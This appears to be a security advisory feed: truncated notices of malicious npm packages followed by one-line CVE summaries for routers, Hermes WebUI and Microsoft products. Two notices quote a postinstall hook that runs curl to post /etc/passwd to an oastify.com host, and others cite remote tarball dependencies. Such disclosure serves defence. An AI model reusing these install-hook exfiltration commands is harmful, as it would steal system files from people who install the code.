MAL-2026-5438 Malicious code in corporate-front-vue (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d26a235f294aacb3800465f89db0f33ecb54f09da450ee98543f8b039249fc12 [email protected] is a near-empty shim index.js exports an empty object whose only meaningful content is a tarball-URL dependency declared i...

MAL-2026-5448 Malicious code in mazemap (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0 package.json declares its only dependency ltidisafe as a direct HTTPS tarball URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz...

MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

MAL-2026-5428 Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

MAL-2026-5430 Malicious code in @sourceflow-uk/sourceflow-tracker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...

CVE-2026-9213

A vulnerability in the affected NETGEAR gaming routers allows attackers with the ability to intercept and tamper with traffic between the router and the Internet, to execute code on the device...

CVE-2026-49959

Hermes WebUI before version 0.51.311 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by placing malicious executable Git configuration in a workspace repository's .git/config file. Attackers can exploit Git subprocess invocations in...

CVE-2026-48574

Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally...

CVE-2026-48569

Improper input validation in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally...

CVE-2026-48563

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47652

Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally...

CVE-2026-47654

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47653

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47643

External control of file name or path in Azure Stack Edge allows an unauthorized attacker to execute code over a network...

CVE-2026-47635

Access of resource using incompatible type 'type confusion' in Microsoft Office allows an unauthorized attacker to execute code locally...

CVE-2026-47298

Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network...

CVE-2026-47287

Relative path traversal in Visual Studio Code allows an unauthorized attacker to perform tampering over a network...

CVE-2026-47289

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47291

Integer overflow or wraparound in Windows HTTP.sys allows an unauthorized attacker to execute code over a network...

CVE-2026-47284

Exposure of sensitive information to an unauthorized actor in Visual Studio Code allows an unauthorized attacker to disclose information over a network...